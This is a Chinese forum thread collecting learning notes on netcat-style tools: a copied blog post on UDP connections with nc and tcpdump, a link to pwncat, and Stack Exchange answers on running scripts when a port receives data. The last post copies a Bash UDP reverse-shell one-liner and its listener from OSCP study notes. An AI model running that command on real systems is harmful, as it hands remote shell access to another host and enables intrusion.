无忧启动论坛

 找回密码
 注册
搜索
最纯净的「微PE装机优盘」UEPON大师作品系统gho:最纯净好用系统下载站数据恢复、数据保护、视频编辑
Win To Go 极致利器(IXUNCIS固态U盘)无忧启动网成立20周年!广告联系 QQ:184822951 微信:wuyouceo
查看: 944|回复: 9
打印 上一主题 下一主题

netcat 相关网络知识学习

  [复制链接]
跳转到指定楼层
1#
发表于 2021-4-3 23:48:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
最近对 netcat, ncat, socat 之类的网络工具有兴趣,本帖把一些好的网页收集进来。主要是备忘。

先搜到这个:

https://jameshfisher.com/2018/03/04/create-udp-connection-with-netcat/

Creating a UDP connection with netcat

The netcat command nc is most often used to create TCP connections,but nc can also create UDP connections.From my remote server, I start listening for UDP connections to UDP port 12345:

jim@remote:~$ nc -u -l 0.0.0.0 12345

I connect to this UDP server from my laptop using:

jim@local:~$ nc -u -p 54321 personal.jameshfisher.com 12345

Above, I use the -u flag to toggle UDP mode for listening and connecting, and I use the -p flag to set the source UDP port on my laptop. Before starting nc on either machine, I started tcpdump on both machines, like this:

jim@remote:~$ sudo tcpdump -n 'udp port 12345 or icmp'
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens4, link-type EN10MB (Ethernet), capture size 262144 bytes

(You’ll see in a minute why I also included icmp in the filter.) If we were using TCP, we would have seen packets in this list as soon as we started the connection, due to the TCP “handshake” to initiate a connection. But with UDP, no packets have been exchanged yet, even though both nc processes are running.

So after starting both nc processes, do we have a “connection”? UDP is sometimes said to be “connectionless”, but I don’t quite buy this. My laptop at least is aware of a connection, and we can see the connection with lsof:

jim@local:~$ sudo lsof -nP -i UDP | awk 'NR == 1 || /12345/'
COMMAND     PID           USER   FD   TYPE            DEVICE SIZE/OFF NODE NAME
nc        41383            jim    3u  IPv4 0x86646b3906fdc4d      0t0  UDP 192.168.1.4:54321->35.190.176.201:12345

On the other hand, the server is not yet aware of the connection; lsof still only shows the process listening for a new connection:

jim@remote:~$ sudo lsof -nP -i UDP | awk 'NR == 1 || /12345/'
COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
nc       19075  jim    3u  IPv4  80196      0t0  UDP *:12345

Next, from my laptop, I type “hi” and hit return. This sends one UDP packet containing the string "hi\n". Finally, we see a UDP packet with tcpdump:

12:49:04.462186 IP 51.6.191.203.54321 > 10.142.0.2.12345: UDP, length 3

At this point, the server is aware of the connection, and we can see it with lsof:

jim@remote:~$ sudo lsof -nP -i UDP | awk 'NR == 1 || /12345/'
COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
nc       19075  jim    3u  IPv4  80196      0t0  UDP 10.142.0.2:12345->51.6.191.203:54321

So UDP does have connections, but in contrast to TCP, the UDP connection is only fully created once the first data packet is sent.

Next, I type “ack” on the server connection, and hit return. A UDP packet goes in the other direction:

13:12:57.824337 IP 35.190.176.201.12345 > 192.168.1.4.54321: UDP, length 4

Next, I kill the nc process on the server:

jim@remote:~$ nc -u -l 0.0.0.0 12345
hi
ack
^C

At this point, if this were TCP, would expect more packets negotiating a connection shutdown. But UDP doesn’t have this handshake either, so nothing is exchanged.

After killing the server process, do we have a connection? According to the server, no. But my laptop is completely unaware that the process was killed on the server, and still shows an active connection:

jim@local:~$ sudo lsof -nP -i UDP | awk 'NR == 1 || /12345/'
COMMAND     PID           USER   FD   TYPE            DEVICE SIZE/OFF NODE NAME
nc        41383            jim    3u  IPv4 0x86646b3906fdc4d      0t0  UDP 192.168.1.4:54321->35.190.176.201:12345

Because the nc process on the laptop still thinks there’s a connection, I can continue to send stuff with it. I type “hello..?”, and hit return. On tcpdump, I see:

13:18:27.846128 IP 192.168.1.4.54321 > 35.190.176.201.12345: UDP, length 9
13:18:27.943967 IP 35.190.176.201 > 192.168.1.4: ICMP 35.190.176.201 udp port 12345 unreachable, length 45

My laptop duly sends the UDP packet, but quickly receives a reply: “udp port 12345 unreachable”!
At this point, my laptop knows the connection is gone, and it is no longer listed:

jim@local:~$ sudo lsof -nP -i UDP | awk 'NR == 1 || /12345/'
COMMAND     PID           USER   FD   TYPE            DEVICE SIZE/OFF NODE NAME

The “udp port 12345 unreachable” information is not in a UDP packet, but an ICMP packet. This is why I included icmp in the tcpdump filter. ICMP is “Internet Control Message Protocol”, and one use is to notify remote hosts that hosts or ports are unreachable. The ICMP packet was generated by my server after it received the “hello..?” message:

13:18:27.898045 IP 51.6.191.203.54321 > 10.142.0.2.12345: UDP, length 9
13:18:27.898099 IP 10.142.0.2 > 51.6.191.203: ICMP 10.142.0.2 udp port 12345 unreachable, length 45

As with the initial connection setup, the connection teardown is delayed in UDP until a packet is received.


2#
发表于 2021-4-4 01:01:35 | 只看该作者
写TinypxeSever的那个大佬好像也有一个,还有台湾的一个什么机构也有
回复

使用道具 举报

3#
发表于 2021-4-4 11:34:48 | 只看该作者
这英文的看不懂。
回复

使用道具 举报

4#
发表于 2021-4-4 19:28:23 | 只看该作者
看不懂,还是支持,楼主出手都是好帖
回复

使用道具 举报

5#
 楼主| 发表于 2021-4-4 20:35:55 | 只看该作者
谢谢各位回帖。

@邪恶海盗:

甚至发现有个 JavaScript 版的 netcat:

https://github.com/roccomuso/netcat
回复

使用道具 举报

6#
 楼主| 发表于 2021-4-5 07:46:25 | 只看该作者
本帖最后由 不点 于 2021-4-5 09:16 编辑

今天找到一个 pwncat,我不知道 pw 是啥意思,猜测可能是 powerful(强大)的意思。
直觉上,第一感,觉得这可能是个 “集大成” 者——集其它各种 *cat 的优点于一身:

https://pwncat.org/
https://github.com/cytopia/pwncat

Netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE).

百度翻译给出的译文是:

Netcat的类固醇与防火墙,入侵检测/入侵防御系统规避,绑定和反向外壳,自我注入外壳和端口转发魔术-和它的完全脚本与Python(PSE)。

steroid 是类固醇,激素。但是,on steroids 却是 “打了激素、超级强悍” 的意思。

哈哈哈哈!pwncat 就是 “打了激素” 的 netcat,我不知道,中国网民所说的 “打鸡血” 是不是 “打激素” 的谐音。

看来我猜的没错——pw 是 power(强力)的意思。


回复

使用道具 举报

7#
 楼主| 发表于 2021-4-5 12:13:50 | 只看该作者
本帖最后由 不点 于 2021-4-5 12:17 编辑

这个帖子很不错:

How to set a script to execute when a port receives a message

https://unix.stackexchange.com/questions/314550/how-to-set-a-script-to-execute-when-a-port-receives-a-message

可惜,stackoverflow 和 stackexchange 网站正在变得越来越垃圾——趁它们还没有彻底沦为垃圾网站,赶紧把有用的内容复制过来!

I'm wondering how to get a shell script to listen in on a certain port (maybe using netcat?). Hopefully so that when a message is sent to that port, the script records the message and then runs a function.

Example:

  • Computer 1 has the script running in the background, the script opened port 1234 to incoming traffic
  • Computer 2 sends message "hello world" to port 1234 of computer 1
  • Script on Computer 1 records the message "hello world" to a variable $MESSAGE
  • Script runs function now that variable $MESSAGE has been set


How do I go about doing this?                     bash shell-script networking daemon                 

                                                asked 2016-10-05 18:19     Daniel  

3 Answers

Should be possible with socat.

Write such a script "getmsg.sh" to receive one message via stdin:

#!/bin/bash
read MESSAGE
echo "PID: $$"
echo "$MESSAGE"

Then run this socat command to invoke our script for each tcp connection on port 7777:

socat -u tcp-l:7777,fork system:./getmsg.sh

Send a test message from another shell:

echo "message 1" | netcat localhost 7777

                 edited 2016-10-05 19:40   answered 2016-10-05 18:30  rudimeier

The UCSPI-TCP way

There are toolsets other than netcat.  Here are how to use a few of them.  They all presume the existence of a service script that runs your func, whatever that may be:

#!/bin/sh
while read -r MESSAGE
do
    echo 1>&2 "${TCPREMOTEIP}" "${TCPREMOTEPORT}" rx "${MESSAGE}"
    func
done

The TCPREMOTEIP and TCPREMOTEPORT environment variables are defined by the UCSPI-TCP protocol.
The script is spawned as an individual process per TCP connection using the various toolsets.  In what follows, the tools are shown as used within a short script.  Such a script, conventionally named run, is how one would run them under a daemontools-family service manager.  They can of course be invoked directly.

Bernstein ucspi-tcp

With Daniel J. Bernstein's ucspi-tcp, tcpserver spawns the service script:

#!/bin/sh -e
exec tcpserver -v -P -R -H -l 0 0.0.0.0 7777 ./service

There are IPv6-capable enhanced versions of Bernstein ucspi-tcp.  With Erwin Hoffman's, tcpserver attempts to handle both IPv4 and IPv6 in one (if the operating system supports this, a few do not) and spawns the service script:

#!/bin/sh -e
exec tcpserver -v -P -R -H -l 0 ::0 7777 ./service

Bercot s6-networking, s6, and execline


With Laurent Bercot's s6-networking, s6-tcpserver4 and s6-tcpserver6 handle IPv4 and IPv6 separately, and spawn the service script:

#!/command/execlineb
s6-tcpserver4 -v 0.0.0.0 7777 ./service

#!/command/execlineb
s6-tcpserver6 -v ::0 7777 ./service

One can build up more complex servers by interposing tools such as s6-tcpserver-access and s6-applyuidgid in the chain immediately before ./service.

nosh UCSPI tools


With the nosh toolset, tcp-socket-listen listens on the TCP socket, again handling IPv4 and IPv6 simulataneously if the operating system supports doing so, and chains to tcp-socket-accept which in turn spawns the service script:

#!/bin/nosh
tcp-socket-listen --combine4and6 :: 7777
tcp-socket-accept --verbose --localname 0
./service

Or one runs two separate processes, on operating systems such as OpenBSD:

#!/bin/nosh
tcp-socket-listen 0.0.0.0 7777
tcp-socket-accept --verbose --localname 0
./service

#!/bin/nosh
tcp-socket-listen :: 7777
tcp-socket-accept --verbose --localname ::
./service

One can build up more complex servers by interposing tools such as ucspi-socket-rules-check and setuidgid in the chain.

#!/bin/nosh
tcp-socket-listen --combine4and6 :: 7777
setuidgid unprivileged-user
tcp-socket-accept --verbose --localname 0
ucspi-socket-rules-check --verbose
./service

Pape ipsvd


With Gerrit Pape's ipsvd, tcpsvd spawns the service script:

#!/bin/sh -e
exec tcpsvd -v 0.0.0.0 7777 ./service

UCSPI-UDP


The common service script can handle when standard input is a stream socket.  But you didn't specify TCP explicitly.
Although some of the aforementioned toolkits can be used to build UDP servers in similar fashion to how one can use them to build TCP servers (c.f. udp-socket-listen in nosh), it's tricky to build the actual service program with shell script, as the shell's builtins do not necessarily cope well when standard input is a datagram socket.

Further reading

   
                        answered 2016-10-10 14:19     JdeBP   
   
This can also be done with udpsvd which is available on Ubuntu/ Debian (see manpage) as well as built-in to busybox.  Example:

# simple UDP "echo" on port 9998
udpsvd 0.0.0.0 9998 cat

Replace cat with your shell script to execute, stdin is the packet.

With netcat, you can run in a loop to keep listening, and pass each packet to myscript:

while true; do nc -ul 9998 | myscript.sh; done

If you wanted to pass all received packets as a stream to a single invocation of your script:

# this will keep listening instead of terminating the process:
nc -kul 9998 |myscript.sh   
                                                                           
answered 2018-09-21 14:43        thom_nic

回复

使用道具 举报

8#
 楼主| 发表于 2021-4-5 13:01:26 | 只看该作者
https://unix.stackexchange.com/questions/86517/command-line-streaming-string-manipulation-from-netcat

Command line streaming string manipulation from netcat

I have a netcat udp connection listening with nc -l -u .... I've been trying to do a per packet manipulation of the incoming data with just command line, but it doesn't look like there is a flag in netcat to indicate a new packet.

First, is it possible to just apply a new line to the end of each packet coming in from netcat?

If not, is there a way instead to match a string and output a new line while netcat is streaming in data?

   udp netcat  edited 2013-08-13 22:39  Gilles 'SO- stop being evil'  asked 2013-08-13 03:35 Ratzes

1 Answer              
               
Server side:

# nc -l -u -p 666 > /tmp/666.txt

Other server side's shell:

# tail -F /tmp/666.txt | while IFS= read -r line; do
    echo "$line";
    # do what you want.
  done;

Client side:

# nc -uv 127.0.0.1 666
#### Print your commands.   

       edited 2013-08-13 22:40      Gilles 'SO- stop being evil'    answered 2013-08-13 07:33    woodstack
               

回复

使用道具 举报

9#
 楼主| 发表于 2021-4-5 13:08:03 | 只看该作者

https://fareedfauzi.gitbook.io/oscp-notes/reverse-shell/linux-reverse-shell

Bash UDP

Victim:

sh -i >& /dev/udp/10.0.0.1/4242 0>&1

Listener:

nc -u -lvp 4242

回复

使用道具 举报

10#
发表于 2021-4-13 18:14:22 | 只看该作者
楼主请继续,来学习的,支持你
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

小黑屋|手机版|Archiver|捐助支持|无忧启动 ( 闽ICP备05002490号-1 )

闽公网安备 35020302032614号

GMT+8, 2021-4-23 09:12

Powered by Discuz! X3.3

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表